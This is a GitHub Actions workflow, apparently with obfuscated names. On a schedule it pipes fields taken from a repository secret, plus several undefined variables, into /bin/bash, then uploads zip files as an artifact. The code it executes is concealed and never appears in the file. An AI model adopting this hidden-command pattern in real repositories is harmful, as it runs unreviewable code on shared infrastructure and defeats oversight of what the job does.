name: xianzhenglingdang
on:
  workflow_dispatch:

  schedule:
    - cron: '33 4,10,16,22 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xianzhenglingdang
        env:
          rrft42: ${{ secrets.rrft42 }}
        run: |
          printf '%s' "$rrft42" | jq -r .k36156 | /bin/bash
          echo $qe4 | jq -r .hlvu962 | /bin/bash
          printf '%s' "$qp5" | jq -r .u3 | /bin/bash
          printf '%s' "$whkm54198" | jq -r .b60 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 7kfPlyLr
          path: "*.zip"
          retention-days: 1
